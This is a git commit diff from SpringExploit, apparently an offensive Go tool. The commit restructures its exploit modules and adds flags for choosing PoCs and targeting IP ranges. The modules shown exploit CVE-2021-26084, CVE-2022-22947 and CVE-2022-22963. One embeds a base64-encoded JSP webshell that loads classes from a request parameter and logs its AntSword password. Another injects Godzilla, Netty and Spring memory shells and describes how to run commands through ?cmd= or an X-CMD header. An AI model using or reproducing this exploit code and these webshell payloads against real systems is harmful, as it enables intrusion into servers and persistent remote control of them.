重构了pocs的目录结构 添加两个参数i和p，后续支持指定vul和ip段

Author: SummerSec

cmd/commons/attack/attack.go

@@ -2,7 +2,10 @@ package attack
 
 import (
 	"github.com/SummerSec/SpringExploit/cmd/commons/poc"
+	_021 "github.com/SummerSec/SpringExploit/cmd/commons/poc/2021"
+	_022 "github.com/SummerSec/SpringExploit/cmd/commons/poc/2022"
 	log "github.com/sirupsen/logrus"
+	"strings"
 )
 
 func Sevice(url string, hashmap map[string]interface{}) {
@@ -13,10 +16,11 @@ func Sevice(url string, hashmap map[string]interface{}) {
 	//for k, v := range hashmap {
 	//	log.Debugln("key: ", k, " value: ", v)
 	//}
-	for _, v := range a { // 循环添加poc
-		t := v.(poc.PoC)
-		t.SendPoc(url, hashmap)
-	}
+	//for _, v := range a { // 循环调用poc
+	//	t := v.(poc.PoC)
+	//	t.SendPoc(url, hashmap)
+	//}
+	attack(url, a, hashmap)
 
 }
 
@@ -28,10 +32,35 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	log.Debug("[*] Add PoC")
 	// TODO 添加poc
 	//pocs["demo"] = &poc.Demo{}
-	//pocs["CVE202222947"] = &poc.CVE202222947{}
-	//pocs["CVE202222963"] = &poc.CVE202222963{}
-	pocs["CVE202126084"] = &poc.CVE202126084{}
+	pocs["CVE202222947"] = &_022.CVE202222947{}
+	pocs["CVE202222963"] = &_022.CVE202222963{}
+	pocs["CVE202126084"] = &_021.CVE202126084{}
 	//pocs["CVE202222965"] = &_022.CVE202222965{}
 	return pocs
 
 }
+
+func attack(url string, pocs map[string]interface{}, hashmap map[string]interface{}) {
+	p := hashmap["Pocs"].(string)
+	// 以,分割,获取poc name 将其转换为数组
+	pocsName := strings.Split(p, ",")
+	var ps []string
+	for _, v := range pocsName {
+		log.Debugf("[*] 分割字符串 %s", v)
+		ps = append(ps, v)
+	}
+
+	// 如果没有选定字符串 则默认所有pocs
+	if len(ps) == 0 {
+		log.Debugln("[*] attack all pocs")
+		for _, v := range pocs {
+			t := v.(poc.PoC)
+			t.SendPoc(url, hashmap)
+		}
+	} else {
+		for p := range ps {
+			pocs[ps[p]].(poc.PoC).SendPoc(url, hashmap)
+		}
+	}
+
+}

cmd/commons/core/options.go

@@ -29,11 +29,14 @@ type Options struct {
 	LogFile string
 	// 重复请求次数
 	Retry int
-	// ip 段
-	//IP string
 
 	// 保存结果
 	Out string
+
+	// pocs 选择特定的poc
+	Pocs string
+	// ip 段
+	IP string
 }
 
 func (o Options) toString() interface{} {
@@ -55,10 +58,12 @@ func ParseOptions() *Options {
 	//flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ")
 	flag.IntVar(&options.Timeout, "timeout", 10, "timeout")
 	flag.StringVar(&options.Out, "o", "result.txt", "out file example: -o=result.txt default result.txt")
+	flag.StringVar(&options.Pocs, "p", "", "pocs example: -p=poc1,poc2,poc3")
+	flag.StringVar(&options.IP, "i", "", "ip segment example: -i=192.168.1.1/32")
 	flag.Parse()
 
 	// TODO 修改版本号
-	v := "0.0.5"
+	v := "0.0.6"
 
 	if options.Version {
 		//ShowBanner(v)

cmd/commons/core/runner.go

@@ -36,9 +36,15 @@ func (r *Runner) Run() {
 
 	if f == "" {
 		urls = append(urls, r.options.Url)
-	} else {
+	} else if r.options.File != "" {
 		urls, _ = utils.ReadFile(r.options.File)
+	} else if r.options.IP != "" {
+		urls = append(urls, r.options.IP)
+	} else {
+		log.Error("No file or url or ips specified")
+		return
 	}
+
 	log.Debugln("URLs: ", urls)
 	var i = 0
 	k := r.options.Thread
@@ -52,7 +58,7 @@ func (r *Runner) Run() {
 				log.Debugln("Running attack on: ", urls[i])
 				// 通道通信 发送url 并且 i++
 				c := make(chan int)
-				go Start(urls[i], hashmap, i, c) // Start 3 goroutines
+				go Start(urls[i], hashmap, i, c) // Start k goroutines
 				i = <-c
 			} else {
 				i++

cmd/commons/poc/CVE-2021-26084.go cmd/commons/poc/2021/CVE-2021-26084.gocmd/commons/poc/CVE-2021-26084.go renamed to cmd/commons/poc/2021/CVE-2021-26084.go

@@ -1,6 +1,7 @@
-package poc
+package _021
 
 import (
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
 	"github.com/fatih/structs"
 	"github.com/imroc/req/v3"
@@ -11,7 +12,7 @@ import (
 type CVE202126084 struct{}
 
 func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
-	reqinfo := NewReqInfo()
+	reqinfo := req2.NewReqInfo()
 	reqmap := structs.Map(reqinfo)
 	u := target + "pages/doenterpagevariables.action"
 	shell := "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmEuaW8uKixqYXZhLnV0aWwuemlwLioiJT4NCjwlIQ0KICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgew0KICAgIFUoQ2xhc3NMb2FkZXIgYykgew0KICAgICAgc3VwZXIoYyk7DQogICAgfQ0KICAgIHB1YmxpYyBDbGFzcyBnKGJ5dGVbXSBiKSB7DQogICAgICByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoYiwgMCwgYi5sZW5ndGgpOw0KICAgIH0NCiAgfQ0KICBwdWJsaWMgYnl0ZVtdIGRlY29tcHJlc3MoYnl0ZVtdIGRhdGEpIHsNCiAgICBieXRlW10gb3V0cHV0ID0gbmV3IGJ5dGVbMF07DQogICAgSW5mbGF0ZXIgZGMgPSBuZXcgSW5mbGF0ZXIoKTsNCiAgICBkYy5yZXNldCgpOw0KICAgIGRjLnNldElucHV0KGRhdGEpOw0KICAgIEJ5dGVBcnJheU91dHB1dFN0cmVhbSBvID0gbmV3IEJ5dGVBcnJheU91dHB1dFN0cmVhbShkYXRhLmxlbmd0aCk7DQogICAgdHJ5IHsNCiAgICAgIGJ5dGVbXSBidWYgPSBuZXcgYnl0ZVsxMDI0XTsNCiAgICAgIHdoaWxlICghZGMuZmluaXNoZWQoKSkgew0KICAgICAgICBpbnQgaSA9IGRjLmluZmxhdGUoYnVmKTsNCiAgICAgICAgby53cml0ZShidWYsIDAsIGkpOw0KICAgICAgfQ0KICAgICAgb3V0cHV0ID0gby50b0J5dGVBcnJheSgpOw0KICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7DQogICAgICAgIG91dHB1dCA9IGRhdGE7DQogICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgfSBmaW5hbGx5IHsNCiAgICAgIHRyeSB7DQogICAgICAgICAgby5jbG9zZSgpOw0KICAgICAgfSBjYXRjaCAoSU9FeGNlcHRpb24gZSkgew0KICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgICB9DQogICAgfQ0KICAgIGRjLmVuZCgpOw0KICAgIHJldHVybiBvdXRwdXQ7DQogIH0NCiAgcHVibGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIHN0cikgdGhyb3dzIEV4Y2VwdGlvbiB7DQogICAgdHJ5IHsNCiAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOw0KICAgICAgcmV0dXJuIChieXRlW10pIGNsYXp6LmdldE1ldGhvZCgiZGVjb2RlQnVmZmVyIiwgU3RyaW5nLmNsYXNzKS5pbnZva2UoY2xhenoubmV3SW5zdGFuY2UoKSwgc3RyKTsNCiAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgew0KICAgICAgQ2xhc3MgY2xhenogPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7DQogICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsNCiAgICAgIHJldHVybiAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBTdHJpbmcuY2xhc3MpLmludm9rZShkZWNvZGVyLCBzdHIpOw0KICAgIH0NCiAgfQ0KJT4NCjwlDQogIFN0cmluZyBjbHMgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiYW50Iik7DQogIGlmIChjbHMgIT0gbnVsbCkgew0KICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGRlY29tcHJlc3MoYmFzZTY0RGVjb2RlKGNscykpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7DQogIH0NCiU+"
@@ -39,10 +40,10 @@ func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
 
 	resp := utils.Send(reqmap)
 
-	if p.checkExp(resp, target, file) {
+	if p.CheckExp(resp, target, file) {
 		context := target + " 存在CVE-2021-26084漏洞！" + target + "testAnt.jsp 蚁剑密码 ant "
 		log.Info(context)
-		p.saveResult(target, file)
+		p.SaveResult(target, file)
 	}
 
 }
@@ -51,11 +52,11 @@ func (CVE202126084) init() {
 	log.Debugf("CVE-2021-26084 init")
 }
 
-func (CVE202126084) saveResult(target string, file string) {
+func (CVE202126084) SaveResult(target string, file string) {
 	utils.SaveToFile(target, file)
 }
 
-func (CVE202126084) checkExp(resp *req.Response, target string, file string) bool {
+func (CVE202126084) CheckExp(resp *req.Response, target string, file string) bool {
 	if !resp.IsSuccess() {
 		log.Debugf(resp.Dump())
 		return true

cmd/commons/poc/CVE-2022-22947.go cmd/commons/poc/2022/CVE-2022-22947.gocmd/commons/poc/CVE-2022-22947.go renamed to cmd/commons/poc/2022/CVE-2022-22947.go

@@ -1,7 +1,8 @@
-package poc
+package _022
 
 import (
 	"fmt"
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
 	"github.com/fatih/structs"
 	"github.com/imroc/req/v3"
@@ -36,7 +37,7 @@ func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) {
 	log.Debugf("SpringRequestMappingMemshell: \n", SpringRequestMappingMemshell)
 	log.Debugln("NettyMemshell: \n" + NettyMemshell)
 	log.Debugf("[+] Running default poc")
-	reqinfo := NewReqInfo()
+	reqinfo := req2.NewReqInfo()
 	reqmap := structs.Map(reqinfo)
 	// 解析target
 	//t, _ := url.Parse(target)
@@ -86,17 +87,17 @@ func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) {
 		reqmap["method"] = "POST"
 		utils.Send(reqmap)
 
-		if p.checkExp(resp, target, hashmap["Out"].(string)) {
+		if p.CheckExp(resp, target, hashmap["Out"].(string)) {
 			log.Info("[+] Successful exploitation CVE-2020-222947")
-			p.saveResult(target, hashmap["Out"].(string))
+			p.SaveResult(target, hashmap["Out"].(string))
 			break
-		} else if !p.checkExp(resp, target, hashmap["Out"].(string)) {
+		} else if !p.CheckExp(resp, target, hashmap["Out"].(string)) {
 			// NettyMemshell.doInject()
 			id = utils.GetCode(6)
 			s := fmt.Sprintf(payload, id, NettyMemshell)
 			reqmap["body"] = s
 			f++
-		} else if !p.checkExp(resp, target, hashmap["Out"].(string)) {
+		} else if !p.CheckExp(resp, target, hashmap["Out"].(string)) {
 			// SpringRequestMappingMemshell.doInject()
 			id = utils.GetCode(6)
 			s := fmt.Sprintf(payload, id, SpringRequestMappingMemshell)
@@ -116,7 +117,7 @@ func (CVE202222947) init() {
 }
 
 // 检查是否成功
-func (p CVE202222947) checkExp(resp *req.Response, url string, file string) bool {
+func (p CVE202222947) CheckExp(resp *req.Response, url string, file string) bool {
 	res := resp.Dump()
 	log.Debugf("[+] res:%s", res)
 	if strings.Contains(res, "route_id") {
@@ -127,15 +128,15 @@ func (p CVE202222947) checkExp(resp *req.Response, url string, file string) bool
 			log.Debugln("[+] Result: " + re.String())
 			log.Info("[+] Successful exploitation CVE-2020-222947")
 			log.Info("[*] 请手动验证是否漏洞利用成功！")
-			p.saveResult(url, file)
+			p.SaveResult(url, file)
 			return true
 		}
 		return true
 	}
 	return false
 }
 
-func (CVE202222947) saveResult(target, file string) {
+func (CVE202222947) SaveResult(target, file string) {
 	context := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell"
 	log.Info("[*]: url: " + target + "哥斯拉内存马 密码和key pass key header添加sumsec头 or /?cmd=echo Result or add header X-CMD: echo Result  默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell")
 	utils.SaveToFile(context, file)

cmd/commons/poc/CVE-2022-22963.go cmd/commons/poc/2022/CVE-2022-22963.gocmd/commons/poc/CVE-2022-22963.go renamed to cmd/commons/poc/2022/CVE-2022-22963.go

@@ -1,6 +1,7 @@
-package poc
+package _022
 
 import (
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
 	"github.com/fatih/structs"
 	"github.com/imroc/req/v3"
@@ -11,7 +12,7 @@ type CVE202222963 struct{}
 
 func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) {
 
-	reqinfo := NewReqInfo()
+	reqinfo := req2.NewReqInfo()
 	reqmap := structs.Map(reqinfo)
 	url := target + "functionRouter"
 	reqmap["url"] = url
@@ -46,9 +47,9 @@ func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) {
 
 	res := dnslog.GetDnslog()
 	if res {
-		if p.checkExp(resp, target, hashmap["Out"].(string)) {
+		if p.CheckExp(resp, target, hashmap["Out"].(string)) {
 			log.Infof("[+] %s: %s", target, "CVE-2022-22963")
-			p.saveResult(target, hashmap["Out"].(string))
+			p.SaveResult(target, hashmap["Out"].(string))
 		}
 	}
 
@@ -59,12 +60,12 @@ func (CVE202222963) init() {
 
 }
 
-func (CVE202222963) saveResult(target string, file string) {
+func (CVE202222963) SaveResult(target string, file string) {
 	context := target + "   存在CVE-2022-22963漏洞\n"
 	utils.SaveToFile(context, file)
 }
 
-func (p CVE202222963) checkExp(resp *req.Response, dnslog string, file string) bool {
+func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, file string) bool {
 	log.Debugf("CVE-2022-22963 checkExp")
 	return true
 

cmd/commons/poc/DefaultPocS.go cmd/commons/poc/PoC.gocmd/commons/poc/DefaultPocS.go renamed to cmd/commons/poc/PoC.go

@@ -5,7 +5,6 @@ import "github.com/imroc/req/v3"
 // PoC poc接口
 type PoC interface {
 	SendPoc(target string, hashmap map[string]interface{})
-	init()
-	saveResult(target string, file string)
-	checkExp(resp *req.Response, target string, file string) bool
+	SaveResult(target string, file string)
+	CheckExp(resp *req.Response, target string, file string) bool
 }

cmd/commons/poc/demo.go

@@ -1,6 +1,7 @@
 package poc
 
 import (
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
 	"github.com/fatih/structs"
 	"github.com/imroc/req/v3"
@@ -12,7 +13,7 @@ type Demo struct{}
 func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 
 	log.Debugf("[+] Running default poc")
-	reqinfo := NewReqInfo()
+	reqinfo := req2.NewReqInfo()
 	reqmap := structs.Map(reqinfo)
 	// TODO 每次传入的url 都是标准的 http(s)://host:port/path
 	// 可以使用 url.Parse 来解析获取 host 和 port
@@ -47,10 +48,10 @@ func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 	log.Debugln("[+] resp: ", resp.Dump())
 
 	// TODO check exp
-	d.checkExp(resp, target, hashmap["Out"].(string))
+	d.CheckExp(resp, target, hashmap["Out"].(string))
 
 	// TODO 保存结果
-	d.saveResult(target, hashmap["Out"].(string))
+	d.SaveResult(target, hashmap["Out"].(string))
 
 }
 
@@ -60,14 +61,14 @@ func (d Demo) init() {
 }
 
 // SaveResult 保存结果
-func (d Demo) saveResult(target, file string) {
+func (d Demo) SaveResult(target, file string) {
 	log.Debugf("[+] save result")
 	// TODO 保存结果
 	utils.SaveToFile(target, file)
 
 }
 
-func (d Demo) checkExp(resp *req.Response, target string, file string) bool {
+func (d Demo) CheckExp(resp *req.Response, target string, file string) bool {
 	log.Debugf("[+] check exp")
 	return false
 }

cmd/commons/poc/request.go cmd/commons/req/request.gocmd/commons/poc/request.go renamed to cmd/commons/req/request.go

@@ -1,4 +1,4 @@
-package poc
+package req
 
 type ReqInfo struct {
 	Method  string

cmd/test/interface/demo.go

@@ -0,0 +1,8 @@
+package _interface
+
+import "github.com/imroc/req/v3"
+
+type Demo interface {
+	Foo(response req.Response)
+	Koo()
+}